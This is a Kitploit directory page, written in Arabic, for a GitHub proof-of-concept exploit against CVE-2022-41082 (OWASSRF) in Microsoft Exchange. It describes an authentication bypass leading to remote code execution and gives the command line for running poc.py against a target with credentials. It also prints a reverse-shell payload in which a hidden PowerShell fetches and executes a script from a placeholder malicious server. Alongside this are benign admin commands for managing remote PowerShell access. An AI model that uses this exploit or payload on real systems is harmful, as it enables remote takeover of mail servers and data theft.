Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-41082 — CVE-2022-41082-poc | Kitploit
أدوات/GitHubGitHub/soltanali0/cve-2022-41082
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubsoltanali0/cve-2022-41082

CVE-2022-41082

CVE-2022-41082-poc

عرض المستودع
31منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-41082

يحتوي هذا المستودع على أداة إثبات المفهوم (PoC) لاستغلال ثغرة OWASSRF (CVE-2022-41082) في خوادم Microsoft Exchange. يسمح هذا الاستغلال للمهاجمين بتنفيذ أوامر عشوائية على الخادم، مما قد يهدد سلامة النظام.

نظرة عامة

تستفيد الأداة من ثغرة OWASSRF لتجاوز المصادقة والحصول على تنفيذ التعليمات البرمجية عن بُعد (RCE) على خادم Exchange. من خلال استغلال هذه الثغرة، يمكن للمهاجم تنفيذ الأوامر كما لو كان مستخدمًا مصرحًا له، مما يؤدي إلى عواقب أمنية خطيرة.

آلية العمل

  1. تجاوز المصادقة: تتصل الأداة بخادم Exchange المستهدف، متجاوزة آليات المصادقة باستخدام طلبات مصممة خصيصًا.
  2. تنفيذ التعليمات البرمجية عن بُعد: بعد تسجيل الدخول بنجاح، تفتح الأداة جلسة تسمح بتنفيذ الأوامر على خادم Exchange.
  3. تنفيذ الأوامر: يمكن للمستخدمين تحديد الأوامر التي سيتم تنفيذها على الخادم، مما يسمح بإجراءات متنوعة، بما في ذلك معالجة الملفات، العمليات الشبكية، أو إنشاء قذائف عكسية.

ملاحظة مهمة

عند استخدام هذه الأداة، يرجى التأكد من إبقاء نفس جلسة Exchange Management Shell مفتوحة. من الضروري تمكين الوصول عن بُعد لـ PowerShell لمستخدم واحد على الأقل بعد تعطيله للآخرين. وإلا، قد تفقد الوصول إلى Management Shell على جميع خوادم Exchange.

أوامر إدارة الوصول إلى PowerShell

فيما يلي بعض أوامر PowerShell المفيدة للتحقق من ومن يملك الوصول وإدارته:

التحقق من وصول PowerShell

لمعرفة المستخدمين الذين لديهم وصول عن بُعد لـ PowerShell والذين ليس لديهم، قم بتشغيل:

root@kitploit:~
Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $true'
Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $false'
تنزيل الأداة

تعطيل وصول PowerShell لجميع المستخدمين

تحذير: كن حذرًا من إغلاق نافذة Exchange Management Shell ما لم تقم بإضافة مستخدم واحد على الأقل مرة أخرى.

يمكنك تعطيل وصول PowerShell لجميع المستخدمين باستخدام الأوامر التالية:

root@kitploit:~
$user = Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $true'
$user | foreach {Set-User -Identity $_ -RemotePowerShellEnabled $false}

أو استخدم أمرًا واحدًا لتحقيق نفس النتيجة:

root@kitploit:~
Get-User -ResultSize Unlimited | Set-User -RemotePowerShellEnabled $false

إعادة تمكين الوصول لمستخدم محدد

لمنح وصول عن بُعد لـ PowerShell لمستخدم محدد، قم بتشغيل:

root@kitploit:~
Set-User "guest" -RemotePowerShellEnabled $true

حل بديل لفقدان وصول PowerShell

إذا فقدت وصول PowerShell لجميع المستخدمين، يمكنك إنشاء مستخدم صندوق بريد جديد بصلاحيات المسؤول. سيتجاوز هذا المستخدم الجديد السياسات المطبقة، مما يسمح لك باستخدام Exchange Management Shell مرة أخرى.

استخدام أداة إثبات المفهوم

المتطلبات

  • Python 3.x
  • المكتبات المطلوبة (قم بتثبيتها عبر pip إذا لزم الأمر)

تشغيل الأداة

لتنفيذ أداة إثبات المفهوم، قم بتشغيل الأمر التالي:

root@kitploit:~
python3 poc.py -H <target_IP> -u <username> -p <password> -c <command_file>

استبدل <target_IP> و <username> و <password> و <command_file> بالقيم الخاصة بك.

مثال لأمر القذيفة العكسية

يمكنك تعديل الأمر في cmd_file ليشمل حمولة قذيفة عكسية. على سبيل المثال:

root@kitploit:~
powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object Net.WebClient).DownloadString('http://your-malicious-server.com/reverse.ps1')"

سيقوم هذا الأمر بتنزيل وتنفيذ سكريبت PowerShell من خادمك، مما يمنحك قذيفة عكسية.

المراجع

لمزيد من المعلومات حول ثغرة OWASSRF وكود إثبات المفهوم، قم بزيارة الرابط التالي: OWASSRF CVE-2022-41082 PoC و https://www.youtube.com/watch?v=c2DZYP6jc7g